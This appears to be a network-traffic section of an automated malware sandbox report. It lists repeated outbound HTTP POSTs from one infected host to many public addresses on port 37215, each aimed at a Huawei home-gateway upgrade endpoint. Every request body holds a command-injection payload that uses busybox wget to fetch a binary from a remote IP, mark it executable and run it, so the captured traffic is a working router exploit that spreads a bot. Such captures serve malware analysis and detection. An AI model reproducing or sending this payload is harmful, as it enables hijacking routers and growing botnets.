                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1794192.168.2.1552048122.210.47.9337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946820021 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1795192.168.2.1549588181.29.183.5637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946844101 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1796192.168.2.1533874190.246.104.20137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946872950 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1797192.168.2.1536998138.52.104.24437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946897030 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1798192.168.2.1551974222.70.6.6437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946911097 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1799192.168.2.1538200186.39.147.5137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946942091 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1800192.168.2.1537088122.254.104.16537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946965933 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1801192.168.2.1536666186.38.255.25237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946981907 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1802192.168.2.1543530102.69.108.9737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947005033 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1803192.168.2.154992031.225.123.16337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947048903 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
